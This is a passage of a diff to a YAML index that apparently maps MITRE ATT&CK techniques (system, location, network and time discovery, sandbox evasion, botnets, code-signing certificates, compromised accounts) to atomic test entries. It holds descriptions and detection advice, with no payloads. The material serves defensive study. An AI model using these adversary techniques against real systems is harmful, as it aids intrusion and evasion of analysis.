behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. - - Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges. - - Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1082 @@ -49011,33 +51727,43 @@ discovery: October 8, 2019. url: https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get source_name: Microsoft Virutal Machine API - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - x_mitre_permissions_required: - - User + description: |- + An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. + + Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. A breakdown of system data can also be gathered through the macOS systemsetup command, but it requires administrative privileges. + + Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) + name: System Information Discovery + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-03-08T10:33:01.066Z' + created: '2017-05-31T21:31:04.307Z' + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Praetorian + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'Instance: Instance Metadata' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations. - x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs - - Process monitoring - - Process command-line parameters - x_mitre_version: '2.1' - x_mitre_contributors: - - Praetorian - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Windows + - IaaS + - Linux + - macOS identifier: T1082 atomic_tests: - name: System Information Discovery @@ -49210,6 +51936,81 @@ discovery: ' name: sh + T1614: + technique: + external_references: + - source_name: mitre-attack + external_id: T1614 + url: https://attack.mitre.org/techniques/T1614 + - source_name: FBI Ragnar Locker 2020 + url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf + description: FBI. (2020, November 19). Indicators of Compromise Associated + with Ragnar Locker Ransomware. Retrieved April 1, 2021. + - source_name: Sophos Geolocation 2016 + url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/ + description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals + target you based on where you live. Retrieved April 1, 2021.' + - source_name: Bleepingcomputer RAT malware 2020 + url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/ + description: Abrams, L. (2020, October 23). New RAT malware gets commands + via Discord, has ransomware feature. Retrieved April 1, 2021. + - source_name: AWS Instance Identity Documents + url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html + description: Amazon. (n.d.). Instance identity documents. Retrieved April + 2, 2021. + - source_name: Microsoft Azure Instance Metadata 2021 + url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows + description: Microsoft. (2021, February 21). Azure Instance Metadata Service + (Windows). Retrieved April 2, 2021. + - source_name: Securelist Trasparent Tribe 2020 + url: https://securelist.com/transparent-tribe-part-1/98127/ + description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, + part 1. Retrieved April 1, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: System Location Discovery + description: |2- + + Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. + + Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021) + + Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016) + id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-20T19:25:49.977Z' + created: '2021-04-01T16:42:08.735Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. + + Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW to gather information.(Citation: FBI Ragnar Locker 2020) + + Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo. + x_mitre_data_sources: + - 'Instance: Instance Metadata' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + x_mitre_contributors: + - Pooja Natarajan, NEC Corporation India + - Hiroki Nagahama, NEC Corporation + - Manikantan Srinivasan, NEC Corporation India + - Wes Hurd + - Katie Nickels, Red Canary + x_mitre_platforms: + - Windows + - Linux + - macOS + - IaaS + atomic_tests: [] T1016: technique: id: attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0 @@ -49232,7 +52033,7 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-15T00:55:33.136Z' + modified: '2021-04-24T13:13:49.594Z' created: '2017-05-31T21:30:27.342Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -49246,8 +52047,10 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Script: Script Execution' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_version: '1.2' identifier: T1016 atomic_tests: @@ -49424,23 +52227,15 @@ discovery: elevation_required: true T1049: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1049 - external_id: T1049 - - source_name: Amazon AWS VPC Guide - url: https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html - description: Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019. - - source_name: Microsoft Azure Virtual Network Overview - url: https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview - description: Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). - What is Azure Virtual Network?. Retrieved October 6, 2019. - - source_name: Google VPC Overview - url: https://cloud.google.com/vpc/docs/vpc - description: Google. (2019, September 23). Virtual Private Cloud (VPC) network - overview. Retrieved October 6, 2019. + created: '2017-05-31T21:30:45.139Z' + modified: '2021-03-08T10:33:01.083Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + id: attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: System Network Connections Discovery description: "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who @@ -49458,36 +52253,43 @@ discovery: can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\"." - name: System Network Connections Discovery - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-03-15T14:15:32.910Z' - created: '2017-05-31T21:30:45.139Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Praetorian - x_mitre_version: '2.1' - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1049 + external_id: T1049 + - source_name: Amazon AWS VPC Guide + url: https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html + description: Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019. + - source_name: Microsoft Azure Virtual Network Overview + url: https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview + description: Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). + What is Azure Virtual Network?. Retrieved October 6, 2019. + - source_name: Google VPC Overview + url: https://cloud.google.com/vpc/docs/vpc + description: Google. (2019, September 23). Virtual Private Cloud (VPC) network + overview. Retrieved October 6, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Windows + - IaaS + - Linux + - macOS + x_mitre_permissions_required: + - User + - Administrator x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_permissions_required: - - User - - Administrator - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + x_mitre_version: '2.2' + x_mitre_contributors: + - Praetorian + x_mitre_is_subtechnique: false identifier: T1049 atomic_tests: - name: System Network Connections Discovery @@ -49621,9 +52423,8 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_version: '1.2' x_mitre_is_subtechnique: false identifier: T1033 @@ -49709,8 +52510,8 @@ discovery: id: attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa x_mitre_version: '1.1' x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. @@ -49768,7 +52569,9 @@ discovery: description: |- An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service) - System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting. + System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) + + This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) external_references: - source_name: mitre-attack external_id: T1124 @@ -49787,14 +52590,20 @@ discovery: description: Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016. source_name: RSA EU12 They're Inside + - source_name: AnyRun TimeBomb + url: https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/ + description: 'Malicious History. (2020, September 17). Time Bombs: Malware + With Delayed Execution. Retrieved April 22, 2021.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-15T01:07:42.700Z' + modified: '2021-04-22T23:09:24.799Z' created: '2017-05-31T21:31:37.450Z' + x_mitre_contributors: + - FIRST.ORG's Cyber Threat Intelligence SIG x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -49806,10 +52615,10 @@ discovery: information are likely less useful due to how often they may be used by legitimate software. x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - API monitoring - x_mitre_version: '1.1' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + x_mitre_version: '1.2' identifier: T1124 atomic_tests: - name: System Time Discovery @@ -49845,25 +52654,13 @@ discovery: name: powershell T1497.003: technique: - created: '2020-03-06T21:11:11.225Z' - modified: '2020-07-01T16:32:02.532Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 - description: "Adversaries may employ various time-based methods to detect and - avoid virtualization and analysis environments. This may include timers or - other triggers to avoid a virtual machine environment (VME) or sandbox, specifically - those that are automated or only operate for a limited amount of time.\n\nAdversaries - may employ various time-based evasions, such as delaying malware functionality - upon initial execution using programmatic sleep commands or native system - scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). - Delays may also be based on waiting for specific victim conditions to be met - (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) - to avoid analysis and scrutiny. " + description: |- + Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time. + + Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. + + Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks) name: Time Based Evasion created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -49872,6 +52669,18 @@ discovery: - source_name: mitre-attack external_id: T1497.003 url: https://attack.mitre.org/techniques/T1497/003 + - source_name: ISACA Malware Tricks + url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes + description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How + Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-01T15:48:28.345Z' + created: '2020-03-06T21:11:11.225Z' x_mitre_platforms: - Linux - macOS @@ -49879,8 +52688,9 @@ discovery: x_mitre_contributors: - Deloitte Threat Library Team x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: 'Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain @@ -49891,7 +52701,7 @@ discovery: being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ' x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_defense_bypassed: - Host forensic analysis - Signature-based detection @@ -49964,8 +52774,9 @@ discovery: other forms of Discovery, especially in a short period of time, may aid in detection. ' x_mitre_data_sources: - - Process command-line parameters - - Process use of network + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_contributors: - Deloitte Threat Library Team x_mitre_platforms: @@ -49975,14 +52786,6 @@ discovery: atomic_tests: [] T1497: technique: - created: '2019-04-17T22:22:24.505Z' - modified: '2020-07-01T16:32:02.272Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d description: "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the @@ -50013,6 +52816,14 @@ discovery: description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-21T15:16:10.835Z' + created: '2019-04-17T22:22:24.505Z' x_mitre_is_subtechnique: false x_mitre_defense_bypassed: - Anti-virus @@ -50027,8 +52838,9 @@ discovery: - macOS - Linux x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should @@ -50057,7 +52869,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Acquire Infrastructure description: |- - Before compromising a victim, adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. + Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase. Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down. id: attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2 @@ -50065,7 +52877,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T17:59:17.606Z' + modified: '2021-04-15T02:53:19.397Z' created: '2020-09-30T16:37:40.271Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false @@ -50105,12 +52917,12 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Botnet - description: 'Before compromising a victim, adversaries may buy, lease, or rent - a network of compromised systems that can be used during targeting. A botnet - is a network of compromised systems that can be instructed to perform coordinated - tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to - use an existing botnet from a booter/stresser service. With a botnet at their - disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) + description: 'Adversaries may buy, lease, or rent a network of compromised systems that + can be used during targeting. A botnet is a network of compromised systems + that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) + Adversaries may purchase a subscription to use an existing botnet from a booter/stresser + service. With a botnet at their disposal, adversaries may perform follow-on + activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)' id: attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074 @@ -50118,7 +52930,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-05T02:15:01.325Z' + modified: '2021-04-15T02:49:14.664Z' created: '2020-10-01T00:49:05.467Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50153,23 +52965,22 @@ resource-development: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Botnet - description: 'Before compromising a victim, adversaries may compromise numerous - third-party systems to form a botnet that can be used during targeting. A - botnet is a network of compromised systems that can be instructed to perform - coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting - a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), - adversaries may build their own botnet by compromising numerous third-party - systems. Adversaries may also conduct a takeover of an existing botnet, such - as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex - Oct 2015) With a botnet at their disposal, adversaries may perform follow-on - activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) + description: 'Adversaries may compromise numerous third-party systems to form + a botnet that can be used during targeting. A botnet is a network of compromised + systems that can be instructed to perform coordinated tasks.(Citation: Norton + Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: + Imperva DDoS for Hire), adversaries may build their own botnet by compromising + numerous third-party systems. Adversaries may also conduct a takeover of an + existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: + Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform + follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).' id: attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:03:23.751Z' + modified: '2021-04-15T03:01:00.271Z' created: '2020-10-01T00:58:35.269Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50197,7 +53008,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Code Signing Certificates description: |- - Before compromising a victim, adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. + Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations. id: attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf @@ -50205,7 +53016,7 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-15T01:15:54.945Z' + modified: '2021-04-15T03:06:56.855Z' created: '2020-10-01T01:41:08.652Z' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection @@ -50218,6 +53029,21 @@ resource-development: atomic_tests: [] T1588.003: technique: + created: '2020-10-01T02:11:47.237Z' + modified: '2021-04-15T03:13:16.259Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: resource-development + type: attack-pattern + id: attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15 + description: |- + Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. + + Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party. + name: Code Signing Certificates + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1588.003 @@ -50226,37 +53052,22 @@ resource-development: description: Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016. source_name: Wikipedia Code Signing - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Code Signing Certificates - description: |- - Before compromising a victim, adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. - - Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party. - id: attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: resource-development - modified: '2020-10-22T18:22:21.007Z' - created: '2020-10-01T02:11:47.237Z' + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004). - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - PRE atomic_tests: [] T1586: technique: id: attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a - description: "Before compromising a victim, adversaries may compromise accounts - with services that can be used during targeting. For operations incorporating - social engineering, the utilization of an online persona may be important. - Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), + description: "Adversaries may compromise accounts with services that can be + used during targeting. For operations incorporating social engineering, the + utilization of an online persona may be important. Rather than creating and + cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for @@ -50287,10 +53098,8 @@ resource-development: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: resource-development - modified: '2020-10-22T18:05:46.296Z' + modified: '2021-04-15T02:59:07.046Z' created: '2020-10-01T01:17:15.965Z' - x_mitre_data_sources: - - Social media monitoring x_mitre_platforms: - PRE x_mitre_is_subtechnique: false @@ -50333,7 +53142,7 @@ resource-development: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Compromise Infrastructure description: |- - Before compromising a victim, adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or 